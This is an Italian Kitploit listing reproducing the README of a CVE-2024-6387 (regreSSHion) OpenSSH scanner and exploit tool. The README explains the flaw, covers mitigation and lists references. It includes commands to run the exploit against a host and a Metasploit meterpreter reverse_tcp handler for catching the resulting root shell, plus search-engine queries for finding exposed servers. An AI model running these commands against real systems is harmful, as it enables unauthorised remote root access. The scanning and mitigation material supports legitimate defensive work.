Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-6387 — Vulnerabilità di esecuzione di codice remoto non autenticata nel server OpenSSH (CVE-2024-6387) | Kitploit
Strumenti/GitHubGitHub/karmakstylez/cve-2024-6387
RicognizioneScanner di VulnerabilitàExploitSicurezza di RetePenetration TestingStrumento di Accesso Remoto
GitHubkarmakstylez/cve-2024-6387

CVE-2024-6387

Vulnerabilità di esecuzione di codice remoto non autenticata nel server OpenSSH (CVE-2024-6387)

Vedi Repository
188471 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

openssh CVE-2024-6387.py - PoC

Note Importanti!!!

L'exploit funziona SOLO su server OpenSSH a 32 bit. Questo perché il POC utilizza puntatori a 32 bit! È anche noto che alcune versioni sono già state corrette e non tutti i server sono vulnerabili. Testato su: Kali Linux, ParrotSec, Ubuntu 22.04

📜 Descrizione

Vulnerabilità di esecuzione di codice remoto non autenticata nel server OpenSSH

CVE-2024-6387.py è uno strumento leggero ed efficiente progettato per identificare server che eseguono versioni vulnerabili di OpenSSH, mirando specificamente alla vulnerabilità regreSSHion scoperta di recente (CVE-2024-6387). Questo script facilita la scansione rapida di più indirizzi IP, nomi di dominio e intervalli di rete CIDR per rilevare potenziali vulnerabilità e garantire che la tua infrastruttura sia sicura.

È stata trovata una race condition nel gestore dei segnali del server OpenSSH (sshd), quando un client non si autentica entro i secondi di LoginGraceTime (120 di default, 600 nelle vecchie versioni di OpenSSH), il gestore SIGALRM di sshd viene chiamato in modo asincrono. Tuttavia, questo gestore dei segnali chiama varie funzioni che non sono async-signal-safe, ad esempio syslog().

📁 Indice

  • 📖 Dettagli
  • 🌟 Caratteristiche
  • ⚙️ Utilizzo
  • O Output
  • 🔍 Host Discovery
  • 🛠️ Mitigazione
  • 💁 Riferimenti
  • 📌 Autore
  • 📢 Disclaimer

✍🏻 Dettagli

Puoi trovare i dettagli tecnici qui.

La falla, scoperta dai ricercatori di Qualys nel maggio 2024 e identificata con il codice CVE-2024-6387, è dovuta a una race condition nel gestore dei segnali di sshd che consente a un attaccante remoto non autenticato di eseguire codice arbitrario come root.

"Se un client non si autentica entro i secondi di LoginGraceTime (120 di default), il gestore SIGALRM di sshd viene chiamato in modo asincrono e chiama varie funzioni che non sono async-signal-safe,"

"Un attaccante remoto non autenticato può sfruttare questa falla per eseguire codice arbitrario con privilegi di root."

🌟 Caratteristiche

  • Scansione Rapida: Scansiona rapidamente più indirizzi IP, nomi di dominio e intervalli CIDR per la vulnerabilità CVE-2024-6387.
  • Recupero Banner: Recupera efficacemente i banner SSH senza autenticazione.
  • Rilevamento Grace Time: Opzionalmente rileva se i server hanno mitigato le vulnerabilità utilizzando l'impostazione LoginGraceTime.
  • Supporto IPv6: Supporta completamente gli indirizzi IPv6 sia per la scansione diretta che basata su nome host.
  • Multi-threading: Utilizza il threading per controlli concorrenti, riducendo significativamente i tempi di scansione.
  • Output Dettagliato: Fornisce un output chiaro con codifica emoji che riassume i risultati della scansione.
  • Controllo Porte: Identifica le porte chiuse e fornisce un riepilogo degli host non reattivi.
  • Rilevamento Versioni Corrette: Riconosce ed esclude le versioni corrette note dai report di vulnerabilità.

⚙️ Utilizzo

Scansione del Server OpenSSH

Requisito: python3 più recente

root@kitploit:~
### Command Line Arguments
mode: Selects the operation mode. Choices are scan or exploit.
-T, --targets: IP addresses, domain names, file paths containing IP addresses, or CIDR network ranges.
-f, --outputfile: File to save results to (e.g., result.json).
-g, --gracetimecheck: Time in seconds to wait after identifying the version to check for LoginGraceTime mitigation (default: 120 seconds).
-n, --nic: Network NIC (default: 'eth0').
-o, --output: Output format for results (choices: 'csv', 'txt', 'json').
-p, --port: Port number to check or exploit (default: 22).
-s, --speed: Number of threads to increase race condition chances (default: 10).
-t, --timeout: Connection timeout in seconds (default: 1 second).
-H, --resolve-hostnames: Resolve Hostnames

Esempi

Scansione di un singolo URL/IP

root@kitploit:~
python3 CVE-2024-6387.py scan -T example.com -p 22

Esecuzione dell'exploit su un dominio / IP

root@kitploit:~
python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0

Processo di Escalation

Cattura del payload

Tutto ciò che devi fare è eseguire prima il comando sottostante (cambia l'handler {yourip}) e poi eseguire l'exploit con il comando sopra

root@kitploit:~
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"

Output

Lo strumento fornisce un output colorato sulla console per una migliore leggibilità:

  • Verde: Connessione o operazione riuscita.
  • Rosso: Connessione fallita o errore.
  • Giallo: Avvisi o informazioni degne di nota.
  • Ciano: Informazioni generali o aggiornamenti di stato.

🔍 Host Discovery

  • Hunter: /product.name="OpenSSH"
  • FOFA: app="OpenSSH"
  • SHODAN: product:"OpenSSH"
  • CENSYS: (openssh) and labels=remote-access

🛠️ Mitigazione

  • Patch Management: Applicare tempestivamente le patch disponibili per OpenSSH è fondamentale per chiudere la finestra di vulnerabilità. L'aggiornamento tempestivo garantisce che gli exploit noti non possano essere sfruttati contro i tuoi sistemi, riducendo così la finestra di opportunità per gli attaccanti.

  • Controllo Accesso Avanzato: Limitare l'accesso SSH tramite controlli basati sulla rete aggiunge un ulteriore livello di difesa. Questo approccio minimizza l'esposizione a potenziali attaccanti limitando le connessioni SSH solo a reti o indirizzi IP autorizzati. L'implementazione di strumenti come regole firewall o l'uso di VPN per accessi sicuri può far rispettare efficacemente queste restrizioni.

  • Segmentazione della Rete: Dividere la rete in segmenti aiuta a contenere l'impatto di una potenziale violazione. Segmentando i sistemi critici e i dati sensibili dalle parti meno critiche della rete, riduci il rischio di movimento laterale da parte degli attaccanti. Questa segmentazione può essere integrata con controlli di accesso rigorosi e monitoraggio per rilevare e rispondere a qualsiasi tentativo non autorizzato di violare questi segmenti.

  • Sistemi di Rilevamento delle Intrusioni (IDS): L'implementazione di sistemi IDS o di prevenzione delle intrusioni (IPS) consente il monitoraggio in tempo reale del traffico di rete e dei log di sistema. Questi sistemi possono rilevare attività sospette e tentativi di sfruttamento potenziali associati alla vulnerabilità regreSSHion. Gli avvisi attivati da tali sistemi consentono un'indagine e una mitigazione tempestive prima che si verifichino danni significativi.

  • Monitoraggio dei Tentativi di Sfruttamento: Il monitoraggio continuo dei log di rete e di sistema è fondamentale. Cerca eventuali schemi o attività anomali che potrebbero indicare un tentativo di sfruttare la vulnerabilità OpenSSH. Questo approccio proattivo aiuta a identificare e rispondere alle minacce prima che possano causare danni.

💁 Riferimenti

  • Autore Originale: Scanner CVE-2024-6387
  • Autore Originale: PoC CVE-2024-6387

Ulteriori Riferimenti

  • http://www.openwall.com/lists/oss-security/2024/07/01/12
  • https://access.redhat.com/security/cve/CVE-2024-6387
  • https://bugzilla.redhat.com/show_bug.cgi?id=2294604
  • https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt
  • https://github.com/zgzhang/cve-2024-6387-poc
  • https://ubuntu.com/security/CVE-2024-6387
  • https://ubuntu.com/security/notices/USN-6859-1
  • https://www.suse.com/security/cve/CVE-2024-6387.html
  • https://explore.alas.aws.amazon.com/CVE-2024-6387.html
  • https://archlinux.org/news/the-sshd-service-needs-to-be-restarted-after-upgrading-to-openssh-98p1/
  • https://www.openssh.com/txt/release-9.8
  • https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-July/000158.html
  • https://lists.mindrot.org/pipermail/openssh-unix-dev/2024-July/041431.html
  • https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
  • https://www.theregister.com/2024/07/01/regresshion_openssh/
  • https://news.ycombinator.com/item?id=40843778

📢 Disclaimer

  • Nota Importante:
    • Questo strumento è sviluppato e utilizzato esclusivamente per test di penetrazione autorizzati e esercitazioni di red teaming. È progettato per identificare e sfruttare vulnerabilità nel server OpenSSH su sistemi Linux basati su glibc. L'uso non autorizzato di questo strumento è severamente vietato. Il proprietario di questo strumento non è responsabile per qualsiasi accesso non autorizzato o uso malintenzionato dello strumento.
  • Avviso Legale:
    • L'uso non autorizzato di questo strumento su sistemi o reti senza esplicita autorizzazione dei rispettivi proprietari potrebbe violare leggi e regolamenti applicabili. Gli utenti sono responsabili di garantire la conformità con gli standard legali ed etici che disciplinano i test e le valutazioni di cybersecurity.
Scarica lo strumento
  • https://security-tracker.debian.org/tracker/CVE-2024-6387
  • https://github.com/oracle/oracle-linux/issues/149
  • https://github.com/rapier1/hpn-ssh/issues/87
  • https://stackdiary.com/openssh-race-condition-in-sshd-allows-remote-code-execution/
  • https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0010
  • http://www.openwall.com/lists/oss-security/2024/07/01/13
  • https://security.netapp.com/advisory/ntap-20240701-0001/